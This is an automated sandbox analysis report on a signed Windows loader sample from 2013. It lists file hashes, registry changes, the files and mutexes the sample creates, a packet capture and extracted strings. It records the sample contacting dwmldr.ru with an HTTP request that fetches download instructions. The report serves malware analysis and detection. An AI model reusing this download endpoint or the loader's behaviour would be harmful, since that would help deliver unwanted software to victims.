Analysis Date2013-10-27 18:18:44
MD5b89be2b9e5ffcad4cec8504a152ae654
SHA1fbd203960c18d475a0c3ac42a51515a2d0d1f757

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 800c6c1a7f7980ccddb8a566e5ce9ac1 sha1: 4f32caeddac5bdced3791b17d09833ea149da6d2 size: 8704
Section.data md5: b3d8cb3b4e9e23b38fb35a4539eb8111 sha1: 3901abea4a26e52a888cfb9cf7f0f5511ddfb450 size: 43008
Section.bss md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 1a9815247cb11f88867cc25abb696f5b sha1: 8617b5ea31222a91cc1751f26559119f81b6036b size: 1536
Section.CRT md5: a1a915fff755bbf0aad8951dca9cbc17 sha1: d34dd8df6a3fd6fbaabf028ee964a8c7c6983fca size: 512
Section.tls md5: 7286f8a585270b237f9f3c472baa210d sha1: 7e29b2d4ae9c31ffb4712c1f60c188340966ad34 size: 512
Section.rsrc md5: f1d6917f43a50a4b4bd59f627060386e sha1: 030bc4a2bed8106d19c1c1f4dbce39f74bacdafb size: 103424
Timestamp2013-10-18 12:08:43
PEhasheecac92c9415ea154befd4415ff7e7b655f5eb99
AVavgCould be a potentially harmful program MLoader

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdwmldr.ru

Network Details:

DNSdwmldr.ru
Type: A
146.255.192.10
HTTP GEThttp://dwmldr.ru/get_download_xml_3?id=5021576&did=141323360&hsig=4583e6db3240e71b13f6651d1ce430cb70b6f63ab10acf833bddb412d43058de
User-Agent: tiny-dl/nix
Flows TCP192.168.1.1:1031 ➝ 146.255.192.10:80

Raw Pcap
0x00000000 (00000)   47455420 2f676574 5f646f77 6e6c6f61   GET /get_downloa
0x00000010 (00016)   645f786d 6c5f333f 69643d35 30323135   d_xml_3?id=50215
0x00000020 (00032)   37362664 69643d31 34313332 33333630   76&did=141323360
0x00000030 (00048)   26687369 673d3435 38336536 64623332   &hsig=4583e6db32
0x00000040 (00064)   34306537 31623133 66363635 31643163   40e71b13f6651d1c
0x00000050 (00080)   65343330 63623730 62366636 33616231   e430cb70b6f63ab1
0x00000060 (00096)   30616366 38333362 64646234 31326434   0acf833bddb412d4
0x00000070 (00112)   33303538 64652048 5454502f 312e310d   3058de HTTP/1.1.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a207469 6e792d64   er-Agent: tiny-d
0x000000a0 (00160)   6c2f6e69 780d0a48 6f73743a 2064776d   l/nix..Host: dwm
0x000000b0 (00176)   6c64722e 72750d0a 0d0a                ldr.ru....


Strings
<<<Obsolete>>
061117000000Z
&0jIFC
0Y|q$K
100208000000Z
111209000000Z
131018120843Z0
140206235959Z0[1
141323360
1|~R3R
200207235959Z0J1
2< dOh
360716235959Z0
6]xa O
;6 zY7Sc	y09
8J\?M'|P
aC+Sv}
aGxE2& w
</assembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
atexit
b8J&?M'
<bt)-8
b%()tbo
/(c) 2006 thawte, Inc. - For authorized use only1
c<@5ms"
calloc
cc@he\"
Certification Services Division1806
_cexit
CFDGCA@
CrncP#b
DeleteCriticalSection
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
]<~?E~G
EnterCriticalSection
ExitProcess
EytV4K
'f.PLh 
FreeLibrary
{f<Sy`
fwrite
f?-Zg/s5|}]8A
g2D2ap&
Gaz}%7
g@D!ep"
GetCommandLineA
GetLastError
__getmainargs
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetStartupInfoA
ggDliX&
gTDpi4&
HeapAlloc
HeapFree
.h)r.B
#http://crl.thawte.com/ThawtePCA.crl0
*http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
http://mail.ru/0
http://ocsp.thawte.com0
h.#Y?|
i0'`Ht
.idata
InitializeCriticalSection
IsBadReadPtr
@jo5ig
_Jv_RegisterClasses
JYF+PF
k:}`2'
`kcoB}
KERNEL32.dll
k/;'H\
k?H3u{*
LeaveCriticalSection
lg&@5m
l[HhIY7
libgcj_s.dll
LLC Mail.Ru0
LLC Mail.Ru1
LoadLibraryA
-*M.+9ma
malloc
memcpy
memmove
memset
mingwm10.dll
Mingw runtime failure:
__mingwthr_key_dtor
__mingwthr_remove_key_dtor
Moscow1
msvcrt.dll
NbmeH8
;n*;	Kq
OJ#D56
OLts{K
_onexit
ooL3q<.
O|Tt61
P`.data
__p__environ
__p__fmode
!,=p~S
P{soRm
R6R;h-h
$RANa#
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
<requestedPrivileges>
RK17QM
RnqiLT
</security>
<security>
__set_app_type
_setmode
SetUnhandledExceptionFilter
signal
s(P.}D6
s.P)}t2?
sQ\y,C
strcmp
SYpRMK
Thawte Code Signing CA - G2
Thawte Code Signing CA - G20
thawte, Inc.1(0&
Thawte, Inc.1$0"
thawte Primary Root CA0
!This program cannot be run in DOS mode.
TIGI)Wu
TlsGetValue
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
tsQtq,C
%tvbT_
  Unknown pseudo relocation bit size %d.
  Unknown pseudo relocation protocol version %d.
vB8?pY
VeriSignMPKI-2-100
vfprintf
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
  VirtualQuery failed for %d bytes at address %p
V?@)P%
W6t5YD6
Wc(%d>
_winmajor
:`	 Wv
x(Mh[r
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xpU0z/T
\XxSTH
"\,yi:
Y|X-a.
$\Yyv>G{\XQ
Z^7D!=
Z&dw$?
Z)[s[2